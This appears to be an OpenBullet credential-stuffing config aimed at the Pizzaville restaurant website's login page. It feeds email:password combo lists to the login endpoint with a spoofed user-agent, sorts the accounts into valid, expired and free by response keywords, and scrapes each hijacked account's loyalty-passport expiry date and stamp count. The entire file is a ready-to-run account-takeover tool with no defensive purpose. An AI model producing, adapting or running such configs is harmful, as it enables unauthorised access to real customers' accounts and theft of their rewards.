[SETTINGS]
{
  "Name": "Pizzaville",
  "SuggestedBots": 100,
  "LastModified": "2019-04-25T11:35:11.4523251-04:00",
  "AdditionalInfo": "",
  "Author": "Howzi",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://www.pizzaville.ca/users/login" 
  CONTENT "_method=POST&data%5BUser%5D%5Bemail%5D=<USER>&data%5BUser%5D%5Bpassword%5D=<PASS>&data%5BUser%5D%5Bremember_me%5D=0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
#Key_Check KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "You are successfully logged in" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Re-Issue Passport" 
    KEY "Extend My Passport" 
  KEYCHAIN Failure OR 
    KEY "Incorrect Username or Password" 
    KEY "Enter a valid email address" 
    KEY "This field can&#039;t be blank" 
    KEY "Forgot your password" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Activate Passport" 
#Expiry PARSE "<SOURCE>" LR "Your passport expires on " "." -> CAP "Passport Expires" 
#Stamps PARSE "<SOURCE>" LR "<h4>You have <span>" " stamp" -> CAP "Stamps" 
